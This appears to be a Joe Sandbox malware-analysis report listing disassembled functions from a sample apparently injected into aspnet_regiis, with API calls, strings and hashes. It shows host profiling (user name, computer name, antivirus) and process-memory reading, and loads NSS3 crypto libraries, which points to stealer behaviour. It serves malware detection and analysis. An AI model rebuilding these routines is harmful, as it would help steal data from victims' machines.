                                                                                                                                                                              • Opcode ID: 42ad580ff243b403dc847bdf9a7f2c608af2d3ab5a1321d8872e6ebd30ac4b20
                                                                                                                                                                              • Instruction ID: cc8d030dc3b28af0e754e1e72090d0b359d6f9e27e5d7ea70e523744f88daa8a
                                                                                                                                                                              • Opcode Fuzzy Hash: 42ad580ff243b403dc847bdf9a7f2c608af2d3ab5a1321d8872e6ebd30ac4b20
                                                                                                                                                                              • Instruction Fuzzy Hash: F4218031641795AFCB11EF1CE484AA67BF4FB05369B048085E846CF76ADF30D942CB40
                                                                                                                                                                              Function 02A212DD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • UnDecorator::UScore.LIBCMT ref: 02A212E7
                                                                                                                                                                              • DName::DName.LIBCMT ref: 02A212F3
                                                                                                                                                                                • Part of subcall function 02A1EFBE: DName::doPchar.LIBCMT ref: 02A1EFEF
                                                                                                                                                                              • UnDecorator::getScopedName.LIBCMT ref: 02A21332
                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 02A2133C
                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 02A2134B
                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 02A21357
                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 02A21364
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                              • String ID: void
                                                                                                                                                                              • API String ID: 1480779885-3531332078
                                                                                                                                                                              • Opcode ID: 15eb3bb9ca4047c94e6bbb18bf8953f3d579105e52208811f58d8c42860c0db1
                                                                                                                                                                              • Instruction ID: a236ec45ae57b28849cce92c5662ab6236e24232bbde887f12cdaa89f8392b3c
                                                                                                                                                                              • Opcode Fuzzy Hash: 15eb3bb9ca4047c94e6bbb18bf8953f3d579105e52208811f58d8c42860c0db1
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B11C671944258AFDB05EB2CCA59AAE7BB5BB00318F0440D9E41ADB692DF309A49CB40
                                                                                                                                                                              Function 02A11563 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 02A11575
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 02A11580
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02A1158B
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 02A11596
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,02A14098,?,Display Resolution: ,02A368F4,00000000,User Name: ,02A368E4,00000000,Computer Name: ,02A368D0,AV: ,02A368C4), ref: 02A115A2
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02A115A9
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A115BB
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDeviceHeap$AllocateCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                              • String ID: %dx%d
                                                                                                                                                                              • API String ID: 81802983-2206825331
                                                                                                                                                                              • Opcode ID: 64d2c35dea96a4fc4cb5dc6f8e7520a3556cdb9f6fdc1c835dc30f187b950798
                                                                                                                                                                              • Instruction ID: 970a35282ff0faabaeb8a2cafb0e5b83fbf94c9d18ee33f6abd289d699d847aa
                                                                                                                                                                              • Opcode Fuzzy Hash: 64d2c35dea96a4fc4cb5dc6f8e7520a3556cdb9f6fdc1c835dc30f187b950798
                                                                                                                                                                              • Instruction Fuzzy Hash: 7AF06832D81330BBE7111FE59C4DE9B7E6CEF4A6A1B004951F606F2150D6B59EA08BA1
                                                                                                                                                                              Function 6CBCCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CBCCD08
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6CBCCE16
                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CBCD079
                                                                                                                                                                                • Part of subcall function 6CC2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC2C2BF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1351604052-0
                                                                                                                                                                              • Opcode ID: 3d5241af37d42ecb7ea89561ee5910793c711431797194ba0bcef6eaffe60434
                                                                                                                                                                              • Instruction ID: ff92029f41c81ec0f83f42be3364b89dc5e1e2fc2c3e2d581fd7946816a47732
                                                                                                                                                                              • Opcode Fuzzy Hash: 3d5241af37d42ecb7ea89561ee5910793c711431797194ba0bcef6eaffe60434
                                                                                                                                                                              • Instruction Fuzzy Hash: 86C1A0B5A002599BDB10CF28DC80BDAB7B8FF48318F1441A8E94897741E775EE95CF92
                                                                                                                                                                              Function 6CB82C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(55CEB38C), ref: 6CB82C5D
                                                                                                                                                                                • Part of subcall function 6CBE0D30: calloc.MOZGLUE ref: 6CBE0D50
                                                                                                                                                                                • Part of subcall function 6CBE0D30: TlsGetValue.KERNEL32 ref: 6CBE0D6D
                                                                                                                                                                              • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CB82C8D
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB82CE0
                                                                                                                                                                                • Part of subcall function 6CB82E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB82CDA,?,00000000), ref: 6CB82E1E
                                                                                                                                                                                • Part of subcall function 6CB82E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CB82E33
                                                                                                                                                                                • Part of subcall function 6CB82E00: TlsGetValue.KERNEL32 ref: 6CB82E4E
                                                                                                                                                                                • Part of subcall function 6CB82E00: EnterCriticalSection.KERNEL32(?), ref: 6CB82E5E
                                                                                                                                                                                • Part of subcall function 6CB82E00: PL_HashTableLookup.NSS3(?), ref: 6CB82E71
                                                                                                                                                                                • Part of subcall function 6CB82E00: PL_HashTableRemove.NSS3(?), ref: 6CB82E84
                                                                                                                                                                                • Part of subcall function 6CB82E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CB82E96
                                                                                                                                                                                • Part of subcall function 6CB82E00: PR_Unlock.NSS3 ref: 6CB82EA9
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB82D23
                                                                                                                                                                              • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CB82D30
                                                                                                                                                                              • CERT_MakeCANickname.NSS3(00000001), ref: 6CB82D3F
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB82D73
                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6CB82DB8
                                                                                                                                                                              • free.MOZGLUE ref: 6CB82DC8
                                                                                                                                                                                • Part of subcall function 6CB83E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB83EC2
                                                                                                                                                                                • Part of subcall function 6CB83E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB83ED6
                                                                                                                                                                                • Part of subcall function 6CB83E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB83EEE
                                                                                                                                                                                • Part of subcall function 6CB83E60: PR_CallOnce.NSS3(6CCE2AA4,6CBE12D0), ref: 6CB83F02
                                                                                                                                                                                • Part of subcall function 6CB83E60: PL_FreeArenaPool.NSS3 ref: 6CB83F14
                                                                                                                                                                                • Part of subcall function 6CB83E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB83F27
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3941837925-0
                                                                                                                                                                              • Opcode ID: c0349248f2c2f7ad250eff683c6a2e52814300faad4f1dcb641cbd47b071b0c5
                                                                                                                                                                              • Instruction ID: a0fc07fccb74ca313ef62c7853bad7a48313af90bf81c0117229cffc0a7092a7
                                                                                                                                                                              • Opcode Fuzzy Hash: c0349248f2c2f7ad250eff683c6a2e52814300faad4f1dcb641cbd47b071b0c5
                                                                                                                                                                              • Instruction Fuzzy Hash: 2251DE71A063629BEB009E29DC89B6F7BE5EF84348F14042CEC5993750EB31E815CB93
                                                                                                                                                                              Function 02A2660D Relevance: 13.6, APIs: 9, Instructions: 64COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _free.LIBCMT ref: 02A26634
                                                                                                                                                                              • _free.LIBCMT ref: 02A26642
                                                                                                                                                                              • _free.LIBCMT ref: 02A2664D
                                                                                                                                                                              • _free.LIBCMT ref: 02A26621
                                                                                                                                                                                • Part of subcall function 02A1D93B: HeapFree.KERNEL32(00000000,00000000,?,02A1D18F,00000000,02A3B6F4,02A1D1D6,02A0EEBE,?,?,02A1D2C0,02A3B6F4,?,?,02A2EC38,02A3B6F4), ref: 02A1D951
                                                                                                                                                                                • Part of subcall function 02A1D93B: GetLastError.KERNEL32(?,?,?,02A1D2C0,02A3B6F4,?,?,02A2EC38,02A3B6F4,?,?,?), ref: 02A1D963
                                                                                                                                                                              • ___free_lc_time.LIBCMT ref: 02A2666B
                                                                                                                                                                              • _free.LIBCMT ref: 02A26676
                                                                                                                                                                              • _free.LIBCMT ref: 02A2669B
                                                                                                                                                                              • _free.LIBCMT ref: 02A266B2
                                                                                                                                                                              • _free.LIBCMT ref: 02A266C1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3704779436-0
                                                                                                                                                                              • Opcode ID: 5e31ef10da06c15dc74ba0c42e40e2691848b9779d01e0f542159d5891450d1d
                                                                                                                                                                              • Instruction ID: aa366ac7c0e0325a0546793ca1267ec68075f42971c35bb685e80e15f8041d33
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e31ef10da06c15dc74ba0c42e40e2691848b9779d01e0f542159d5891450d1d
                                                                                                                                                                              • Instruction Fuzzy Hash: 301194B2142B11EBDF296F7DCAC4B5AB3ABEB01B18F14096EE14497648CF349859CE14
                                                                                                                                                                              Function 02A0F915 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,02A0FBE3,?,00000000,00000000,?,?), ref: 02A0F934
                                                                                                                                                                              • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,02A0FBE3,?,00000000,00000000), ref: 02A0F95E
                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 02A0F9AB
                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 02A0FA04
                                                                                                                                                                              • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 02A0FA5C
                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,02A0FBE3,?,00000000,00000000,?,?), ref: 02A0FA6D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MemoryProcessQueryReadVirtual
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 3835927879-2766056989
                                                                                                                                                                              • Opcode ID: 4d2667c532e227ff911085a7ab2b972c7a1ae29a75a57455b03c51ba5edfcc94
                                                                                                                                                                              • Instruction ID: 57aab1dcd304b01c7d0829ff845f98b8ac3f229caffce20c364f0155c3bca402
                                                                                                                                                                              • Opcode Fuzzy Hash: 4d2667c532e227ff911085a7ab2b972c7a1ae29a75a57455b03c51ba5edfcc94
                                                                                                                                                                              • Instruction Fuzzy Hash: 95418D32A00209BFDF209FA5EC85BEE7B76EB44764F148425FA00E65A0DF74C952CB90
                                                                                                                                                                              Function 6CB98CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • TlsGetValue.KERNEL32(00000000,00000000,?,6CBA124D,00000001), ref: 6CB98D19
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CBA124D,00000001), ref: 6CB98D32
                                                                                                                                                                              • PL_ArenaRelease.NSS3(?,?,?,?,?,6CBA124D,00000001), ref: 6CB98D73
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CBA124D,00000001), ref: 6CB98D8C
                                                                                                                                                                                • Part of subcall function 6CC2DD70: TlsGetValue.KERNEL32 ref: 6CC2DD8C
                                                                                                                                                                                • Part of subcall function 6CC2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC2DDB4
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CBA124D,00000001), ref: 6CB98DBA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                              • String ID: KRAM$KRAM
                                                                                                                                                                              • API String ID: 2419422920-169145855
                                                                                                                                                                              • Opcode ID: f1c604d408b074d30bd5d0e24bcd7338428eb665ef5d160d267609880642f4cb
                                                                                                                                                                              • Instruction ID: 50d6583703a567088095afdc0e7ce77e3e0e5518d3e413850597a22f09b1e3fd
                                                                                                                                                                              • Opcode Fuzzy Hash: f1c604d408b074d30bd5d0e24bcd7338428eb665ef5d160d267609880642f4cb
                                                                                                                                                                              • Instruction Fuzzy Hash: B8218DB1A046518FDB00EF38C48455AB7F0FF56308F15897ED89887721EB36E841CB92
                                                                                                                                                                              Function 6CBBACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CBBACE6
                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CBBAD14
                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CBBAD23
                                                                                                                                                                                • Part of subcall function 6CC9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC9D963
                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6CBBAD39
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                              • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                                                                                                              • API String ID: 332880674-3521875567
                                                                                                                                                                              • Opcode ID: 13838a14c40d7bccf118d5686126fb98d825e5acee3726a5b7d21314b9d6d970
                                                                                                                                                                              • Instruction ID: 70447f4ebe0a47c4664f936129695eb166481d73f8e66bec8a4acd3e889fd335
                                                                                                                                                                              • Opcode Fuzzy Hash: 13838a14c40d7bccf118d5686126fb98d825e5acee3726a5b7d21314b9d6d970
                                                                                                                                                                              • Instruction Fuzzy Hash: 02210730A001A99FDB40DB64DD98BBE33B5EB4B70AF044425E809E7A11EF349D49CF92
                                                                                                                                                                              Function 6CC90ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CC90EE6
                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CC90EFA
                                                                                                                                                                                • Part of subcall function 6CB7AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CB7AF0E
                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F16
                                                                                                                                                                              • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F1C
                                                                                                                                                                              • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F25
                                                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F2B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
